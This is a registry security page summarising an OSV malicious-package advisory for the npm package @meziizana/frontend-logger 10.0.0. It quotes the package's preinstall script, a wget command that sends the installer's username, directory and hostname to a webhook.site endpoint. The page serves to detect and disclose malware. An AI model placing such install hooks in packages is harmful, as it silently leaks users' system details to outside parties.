registry  /  @meziizana/frontend-logger  /  10.0.0

@meziizana/frontend-logger@10.0.0

OSV Malicious Advisory

scanned 1h ago · by OpenSSF/OSV

OpenSSF/OSV advisory MAL-2026-10208 confirms this npm version as malicious. package.json declares a preinstall lifecycle script that runs wget against https://webhook.site/f164a383-b9e7-4379-b18c-38bf41a3c152/ with query parameters carrying the installer's username ($(whoami)), current working directory ($(pwd)), and hostname ($(hostname)). This fires automatically on `npm install` with no user consent and sends installer-identifying reconnaissance data to a third-party collection endpoint...

Advisory
MAL-2026-10208
Source
OpenSSF Malicious Packages via OSV
Summary
Malicious code in @meziizana/frontend-logger (npm)
Details
package.json declares a preinstall lifecycle script that runs wget against https://webhook.site/f164a383-b9e7-4379-b18c-38bf41a3c152/ with query parameters carrying the installer's username ($(whoami)), current working directory ($(pwd)), and hostname ($(hostname)). This fires automatically on `npm install` with no user consent and sends installer-identifying reconnaissance data to a third-party collection endpoint. webhook.site is a public request-inspection service commonly abused as a low-effort exfiltration sink; the destination is not tied to any legitimate build or install task.
Decision reason
One or more suspicious static signals were detected.

Decision evidence

public snapshot
Behavioral surface
SourceNo risky source behavior triggered.
Supply chainNo supply-chain packaging signals triggered.
ManifestNo manifest risk signals triggered.
scanned 0 file(s), 0 B of source

Source & flagged code

2 flagged · loading source
package.jsonView file
scripts.preinstall = wget --quiet "https://webhook.site/f164a383-b9e7-4379-b18c-38bf41a3c152/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)"
High
Install Time Lifecycle Scripts

Package defines install-time lifecycle scripts.

package.jsonView on unpkg
scripts.preinstall = wget --quiet "https://webhook.site/f164a383-b9e7-4379-b18c-38bf41a3c152/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)"
Medium
Ambiguous Install Lifecycle Script

Install-time lifecycle script is not statically allowlisted and needs review.

package.jsonView on unpkg

Findings

1 High1 Medium1 Low
HighInstall Time Lifecycle Scriptspackage.json
MediumAmbiguous Install Lifecycle Scriptpackage.json
LowScripts Present